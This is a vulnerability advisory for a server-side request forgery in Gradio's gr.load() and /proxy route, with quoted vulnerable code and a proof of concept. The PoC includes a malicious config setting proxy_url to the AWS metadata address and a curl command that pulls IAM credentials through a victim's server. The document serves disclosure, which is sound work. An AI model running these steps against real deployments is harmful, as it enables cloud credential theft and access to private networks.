CVE-2026-28416

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.

Details

The vulnerability exists in Gradio's config processing flow when loading external Spaces:

1. Config Fetching (gradio/external.py:630): gr.load() calls Blocks.from_config() which fetches and processes the remote Space's configuration.
2. Proxy URL Trust (gradio/blocks.py:1231-1233): The proxy_url from the untrusted config is added directly to self.proxy_urls:

   ```python

   if config.get("proxy_url"):

       self.proxyurls.add(config["proxyurl"])

   ```

1. Built-in Proxy Route (gradio/routes.py:1029-1031): Every Gradio app automatically exposes a /proxy={url_path} endpoint:

   ```python

   @router.get("/proxy={urlpath:path}", dependencies=[Depends(logincheck)])

   async def reverseproxy(urlpath: str):

   ```

1. Host-based Validation (gradio/routes.py:365-368): The validation only checks if the URL's host matches any trusted proxy_url host:

   ```python

   issafeurl = any(

       url.host == httpx.URL(root).host for root in self.blocks.proxy_urls

   )

   ```

An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.

PoC

Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6

1. Attacker creates a malicious Gradio Space that returns this config:

{
    "mode": "blocks",
    "components": [...],
    "proxy_url": "http://169.254.169.254/"  # AWS metadata endpoint
}

2. Victim loads the malicious Space:

import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)

3. Attacker exploits the proxy:

## Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"

Impact

Who is impacted:

• Any Gradio application that uses gr.load() to load external/untrusted Spaces
• HuggingFace Spaces that compose or embed other Spaces
• Enterprise deployments where Gradio apps have access to internal networks

Attack scenarios:

• Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials
• Internal service access: Reach databases, admin panels, and APIs on private networks
• Network reconnaissance: Map internal infrastructure through the victim
• Data exfiltration: Access sensitive internal APIs and services